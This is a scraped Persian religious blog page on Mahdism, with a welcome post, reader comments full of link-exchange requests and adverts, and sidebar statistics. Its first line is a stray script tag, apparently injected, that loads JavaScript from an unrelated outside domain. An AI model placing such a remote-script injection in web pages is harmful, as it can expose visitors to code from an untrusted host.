script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> سخنی با عزیزان بیننده
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند
سه شنبه 15 شهريور 1398برچسب:, :: 11:57 ::  نويسنده : زارعی

با سلام خدمت بینندگان عزیز

اینجانب قصد دارم وبلاگی مذهبی با موضوع مهدویت ارائه کنم و اطلاعاتی را که دارم در اختیار شما عزیزان قرار دهم.

علاقه مندان به وبلاگ نویسی در رابطه با این موضوع می توانند با عضویت در این وبلاگ ما را مستفیض کنند و کمک

کنند تا این وبلاگ همیشه تازه و به روز باشد.

لطفا با سوالات ، نظرات و پیشنهادات ارزشمندتون ما را در رسیدن به اهداف والا یاری دهید.

با تشکر مدیر وبلاگ



نظرات شما عزیزان:

مهدیه
ساعت17:37---12 آبان 1391
سلام عزیزدلم کلوب ادرستو دیدم

همشهری فکر کنم هستیمپاسخ:واقعا؟ پس من از این بابت خیلی خوشحالم. عید شما هم مبارک.


reza
ساعت10:24---26 مهر 1391
سلام وبلاگ خیلی زیبایی دارید موفق باشید به انجمن منم یه سر بزن میخوام انجمنو به یه مکان شلوغ تبدیل کنم پس بیا و توش فعالیت کن ممنون منتظر شما و دوستانتان هستیم(انجمن زاهدانی ها)

http://patogh-forum.rzb.ir/Forum
پاسخ:ممنون از لطف شما


Asre_Yakhiii
ساعت14:09---21 آبان 1390
برای خندیدن منتظر خوشبختی نباش ، شاید خوشبختی منتظر خندیدن توست .


ــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــ ــــــ


سلام وبتون قشنگ و عالیه. انشاالله همیشه موفق باشید


عید غدیر هم پیشاپیش مبارک. به من هم سر بزنید و اگر موافق به تبادل لینک بودین منو خبر کنید


التماس دعا
پاسخ:متشکرم، عید شما هم مبارک.


صنایع باتیک آراد
ساعت12:28---21 آبان 1390
باسلام
با نهایت احترام متقاضی تبادل لینک و تبادل بنر با وبلاگ شما میباشم
سایت ما را با عنوان "صنایع رباتیک آراد" لینک کنید.
سپس یک ایمیل حاوی عنوان لینک وبلاگتان برای ما ارسال کنید.
سایت ما دارای:
Page rank:3
500000 بازدید در روز
و دارای 4 دامنه اختصاصی
میباشد.
www.aradrobo.com
www.saha-co.com
www.robowar.ir
www.robocop.ir
با تشکر


ارنیکا
ساعت11:25---10 آبان 1390
بنام خدا

سلام

........................................................ .....

بزرگترین وبلاک دهستان عشق(نگین کلهر)

........................................................ ......

........................................................ ......

دهستانی در غرب کشور

ایل بزرگ کلهر

اشنای با زبان و رسم ورسوم ایل کلهر در غرب کشور

کوه بازی دراز

دومین شهر مقاوم کشور

شیر زن ایران-کرد کلهری

دهستان دیره(نگین کلهر)

استان کرمانشاه-شهرستان گیلانغرب-دهستان دیره

........................................................ ...................

وبلاک خوبی دارید

اگر اومدی سر زدی نظر دادی تشکر

اگر نیامدی دمت گرم

........................................................ .............

موفق وسر بلند باشید
پاسخ:از این که قدم رنجه کردین متشکرم.


مسعود
ساعت10:31---14 مهر 1390
با سلام

وبلاگ خیلی خوبی دارید. ولی کاشکی این تبلیغات را حذف کنید که از بار معنوی وبلاگ کم نشود.

راستی ممنون از این که وبلاگ من رو لینک کردید.

من هم شما را لینک کردم
پاسخ:سلام دوست عزیز چشم اتفاقا خودم هم چنین قصدی رو داشتم و مطئن باشین تو اولین فرصت این کار رو خواهم کرد


محمد حسین
ساعت9:14---1 مهر 1390
سلام آقای زارعی واقعا وبلاگ زیبایی داریدمن شما رو لینک کردم.ممنون میشم شما منو لینک کنید.با اسم از آبی ها بدم میاد

آموزشگاه آرایش و پیرایش کمند
ساعت12:06---26 شهريور 1390
سلام ...

خوشحالم که همکاریم ...

من با افتخار شما رو لینک کردم ...

موفق باشید
پاسخ:متشکرم. من هم شما رو لینک کردم.


بلاگراه
ساعت12:58---19 شهريور 1390
سلام,



بلاگراه یک سیستم جدید و حرفه ای ها

دوست من یک سیستم جدید بلاگدهی راه اندازی شده که خیلی امکانات جالب و جدید داره که تو هیچ کجای اینترنت نیست.

از شما دعوت می کنم به جمع ما وبلاگ نویسان حرفه ای بپیوندید



آدرس سایت

http://www.blograh.com

نمونه ای از وبلاگ ثبت شده

http://photo.blograh.com



امکان ثبت نام آسان و بدون هیچ پیچدگی

اختصاص آدرس به صورت You.BlogRah.Com

امكان ایجاد وبلاگ به صورت كاملا رایگان و بدون نیاز به هیچ هزینه

امکان دسته بندی کردن مطالب در صفحه اصلی سایت

ارسال پست به آینده

اختصاص 100MB فضای رایگان برای آپلود عکس ها

ادیتور قدرتمند تحت وب جهت انتشار محتوی مورد نظر

امكان ایجاد ویرایش و انتخاب قالب های گوناگون متناسب با نوع محتوی شما

امكان دسته بندی محتوی بر اساس موضوعات مختلف

امكان ارسال دو مرحله ای مطالب به صورت ادامه متن

امكان دریافت نظرات بازدید كنندگان وبلاگ شما

امكان تعیین نحوه دریافت نظرات بازدید كنندگان

امكان تائید نظرات خوانندگان و بازدید كنندگان وبلاگ شما

امكان ارسال تصویر وبلاگ و انتشار توضیحاتی در مورد وبلاگ

دریافت یك آدرس وبلاگ كاملا شخصی بر اساس نام كاربری شما

ایجاد لینك های مجزا برای هر یك از ارسال های شما

امكان ثبت لینك دوستان و نمایش آنها

سیستم rss خوان برای دریافت مطالب دیگر سایتها و وبلاگها

گوگل مپ(sitemap.php) و یاهو مپ (allpost.php) برای هر وبلاگ بصورت مجزا



راهنمای یک دقیقه ای

آدرس مورد نظر خود را انتخاب کرده و در قسمت
پاسخ:سلام دوست من مطمئنا همینطوره که می فرمایید به روی چشم اگر قرار شد یه وبلاگ دیگه راه اندازی کنم حتما از سیستم بلاگدهی شما استفاده خواهم کرد.


نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 2
بازدید دیروز : 0
بازدید هفته : 157
بازدید ماه : 250
بازدید کل : 33019
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1